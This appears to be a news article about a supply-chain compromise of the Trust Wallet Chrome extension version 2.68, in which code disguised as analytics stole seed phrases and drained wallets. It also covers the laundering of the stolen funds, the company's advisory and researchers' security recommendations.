On December 25, multiple cryptocurrency users reported rapid, unauthorized withdrawals from their Trust Wallet browser extension, prompting an immediate community alert. Initial reports surfaced via on-chain investigator ZachXBT, who flagged hundreds of compromised addresses across EVM-compatible chains, Bitcoin, and Solana within a two-hour window. The sudden surge in reported losses—initially estimated at over $6 million—triggered urgent warnings on Telegram and X, urging all users to revoke approvals and withdraw funds.
Community researchers quickly identified the Trust Wallet Chrome extension version 2.68 as a common denominator. Investigation of the extension’s JavaScript files revealed unexplained additions in “4482.js” that were absent from official release notes. Suspicious code segments masked as analytics functions were, in fact, capable of capturing seed phrases, relaying them to metrics-trustwallet[.]com, and then draining wallets automatically upon phrase import. The malicious payload activated only for wallet-import events, evading early detection.
Subsequent follow-the-chain analysis traced over $6 million in stolen assets funnelled through privacy mixers and obfuscation services, highlighting the attackers’ intent to launder funds swiftly. Victim addresses spanned insider multisig accounts, high-value individual wallets, and small retail traders alike, underscoring the vulnerability of browser-based wallets to supply-chain attacks. Peel transactions from major mixers such as Tornado Cash and Wasabi Wallet were also observed, indicating coordinated laundering strategies.
Following public scrutiny, Trust Wallet issued an official advisory acknowledging a security incident affecting only extension version 2.68. The advisory recommended immediate disabling of the extension, upgrading to version 2.69 from the official Chrome Web Store, and avoiding seed phrase imports into browser environments. Mobile and non-Chrome users were reported to be unaffected. Trust Wallet emphasized that the breach did not compromise its core mobile app or on-chain smart contracts.
The incident reignited debate around self-custody risks and operational security. Experts reiterated that key management environments are as critical as cryptographic protocols, and that supply-chain integrity must be enforced by both wallet providers and browser marketplaces. As an immediate precaution, security researchers advised affected users to migrate remaining assets to fresh wallets created on secure, air-gapped devices, revoke all dApp approvals, and monitor network activity for suspicious interactions.
In the wake of the attack, calls for standardized extension vetting, transparent change logs, and independent audits have grown louder. Blockchain security firms and open-source auditor groups are collaborating on tools to detect anomalous client-side code in popular wallet extensions. For now, the Trust Wallet incident stands as a stark example of how supply-chain vulnerabilities can undermine the promise of self-sovereign asset control, urging the community to prioritize end-to-end security in wallet design and distribution.
Comments (0)